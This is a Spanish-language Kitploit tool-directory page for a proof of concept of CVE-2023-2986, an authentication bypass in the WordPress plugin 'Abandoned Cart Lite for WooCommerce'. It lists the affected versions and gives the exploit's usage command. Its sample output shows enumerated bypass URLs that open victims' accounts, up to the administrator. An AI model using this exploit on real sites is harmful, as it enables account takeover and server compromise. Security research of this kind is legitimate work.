Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-2986 — Prueba de concepto para la vulnerabilidad CVE-2023-2986 en el plugin 'Abandoned Cart Lite for WooCommerce' en WordPress | Kitploit
Herramientas/GitHubGitHub/ayantaker/cve-2023-2986
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubayantaker/cve-2023-2986

CVE-2023-2986

Prueba de concepto para la vulnerabilidad CVE-2023-2986 en el plugin 'Abandoned Cart Lite for WooCommerce' en WordPress

Ver Repositorio
63hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto Original para CVE-2023-2986

Prueba de Concepto para la vulnerabilidad CVE-2023-2986 en el plugin 'Abandoned Cart Lite for WooCommerce' de WordPress

Detalles Relacionados

  • Enlace NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • Fuente del Plugin : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • Versiones vulnerables : version <= 5.14.2 version <= 5.15.1
  • Versión parcheada : 5.15.0 5.15.2

Actualización

Se pensaba que la versión 5.15.0 solucionaba el problema, pero descubrí que no se había solucionado por completo y se ha actualizado. Así que la versión parcheada real es 5.15.2

Análisis de Vulnerabilidad

  • Blogs de Keysight : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

Uso

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

Al ingresar la URL en el navegador, obtendrá acceso a la cuenta del usuario respectivo. Si el propio usuario administrador de wordpress tiene una entrada, esto dará acceso a la consola de administración, lo que lleva a un compromiso total del servidor de wordpress.

Descargo de Responsabilidad

Esta Prueba de Concepto (POC) ha sido creada puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinada a ser utilizada para atacar sistemas excepto donde esté explícitamente autorizada. El autor no es responsable de ningún uso indebido de la POC. Úsela de manera responsable.

Descargar herramienta